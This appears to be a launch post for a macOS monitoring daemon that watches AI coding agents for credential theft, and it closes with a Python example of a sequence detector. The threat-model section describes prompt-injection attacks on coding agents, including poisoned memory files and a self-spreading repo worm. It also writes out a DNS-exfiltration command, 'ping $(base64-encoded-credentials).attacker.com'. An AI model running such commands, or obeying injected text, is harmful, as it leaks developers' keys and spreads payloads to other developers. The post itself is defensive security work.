The result is Agent Shield — a background daemon that watches AI coding tools (Claude Code, Cursor, Cline, Copilot, Codex) at the OS level using macOS FSEvents, lsof, and subprocess tree polling. All event data stays in a local SQLite database.
Privacy note: If you set ANTHROPIC_API_KEY, the AI incident investigator activates and sends event context — process names, file paths, hostnames, and IP addresses — to the Claude API to generate incident reports. Nothing else leaves the machine. You can disable the AI analyst in Settings to run entirely on-device.
The threat model is concrete
Three attacks shaped the design:
CVE-2025-55284 — prompt injection causes Claude Code to run ping $(base64-encoded-credentials).attacker.com. Your API keys leave via DNS — invisible to any HTTPS-layer proxy watching your network traffic.
SpAIware (Windsurf, August 2025) — malicious content injected into AI memory files. Every future session silently exfiltrates data before doing any work. The injection point is a file, not a network request.
AgentHopper — AI reads a malicious repo, injects payloads into local source files, git pushes to spread, infects the next developer's AI agent. No single event looks alarming; the sequence is: file read → file write → git push.
That last one is why the cross-event correlation engine exists. The system stores a rolling event window per process and flags sequences. Each event alone is normal. The pattern is not.
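To make the rolling-window idea concrete, here is an added example (not Agent Shield's own code) of a per-process sequence detector for the credential read → unknown network → git push pattern. The event fields, the 300-second window, the credential path list and the allowlisted hosts are assumptions made for illustration.

```python
# Added example, not Agent Shield code: per-process rolling event window
# with ordered-subsequence rule matching. Field names and constants assumed.
from collections import defaultdict, deque
from dataclasses import dataclass

WINDOW_SECONDS = 300                                   # assumed window size
CRED_PATHS = (".aws/credentials", ".ssh/", ".netrc", ".env")   # assumed
KNOWN_HOSTS = {"api.anthropic.com", "github.com"}              # assumed

@dataclass
class Event:
    pid: int
    ts: float      # seconds since epoch (monotonic in tests)
    kind: str      # "file_read" | "file_write" | "network" | "exec"
    detail: str    # path, destination host/IP, or command line

def is_cred_read(e):       return e.kind == "file_read" and any(p in e.detail for p in CRED_PATHS)
def is_unknown_network(e): return e.kind == "network" and e.detail not in KNOWN_HOSTS
def is_git_push(e):        return e.kind == "exec" and e.detail.startswith("git push")

# A rule is an ordered list of predicates that must all match, in order,
# inside one process's window. Each step alone is benign.
RULES = {"cred-read -> unknown-network -> git-push": [is_cred_read, is_unknown_network, is_git_push]}

class SequenceDetector:
    def __init__(self, window=WINDOW_SECONDS):
        self.window = window
        self.history = defaultdict(deque)   # pid -> recent Events

    def observe(self, e):
        """Record one event; return names of rules this event completes."""
        q = self.history[e.pid]
        q.append(e)
        while q and e.ts - q[0].ts > self.window:   # expire events outside the window
            q.popleft()
        # Only evaluate rules whose final step this event satisfies, keeping cost low.
        return [name for name, steps in RULES.items()
                if steps[-1](e) and self._ordered_match(q, steps)]

    @staticmethod
    def _ordered_match(events, steps):
        i = 0
        for ev in events:                 # greedy subsequence scan over the window
            if i < len(steps) and steps[i](ev):
                i += 1
        return i == len(steps)

if __name__ == "__main__":
    d = SequenceDetector()   # constructed sample stream, one process
    for ev in (Event(4242, 0.0, "file_read", "/Users/dev/.aws/credentials"),
               Event(4242, 5.0, "network", "203.0.113.7"),
               Event(4242, 9.0, "exec", "git push origin main")):
        print(ev.kind, "->", d.observe(ev) or "no alert")
```

Because matching is per pid, the same three events spread across unrelated processes do not correlate, and an expired window resets the chain.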
Why not a network proxy
Every existing tool I looked at — CodeGate, Pipelock, and Sysdig's announcement this week — sits in the network path and inspects API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration via ping. It can't monitor what the AI writes to its own memory directories, which is where SpAIware lives.
The attack surface isn't the API layer. It's the OS.
What's built
- macOS FSEvents file watcher (real-time, no polling), subprocess tree monitoring, network classification
- Two-phase scanning: fast regex first, Claude API only on regex hits (keeps cost low)
- SpAIware detection — FSEvents watcher on AI memory directories (~/.claude/, ~/.cursor/, etc.)
- Cross-event sequence detection (cred read → unknown network → git push)
- MCP server allowlisting and discovery
- Policy enforcement: kill/suspend/block on confirmed threats (opt-in, monitor-only by default)
- Weekly threat intel refresh via a research agent (Exa + Claude)
- Web dashboard at localhost:6080, menu bar app
Honest limitations
macOS only — FSEvents is Apple-specific. Python daemon, not a polished installer yet. Going open source (MIT) as part of this release.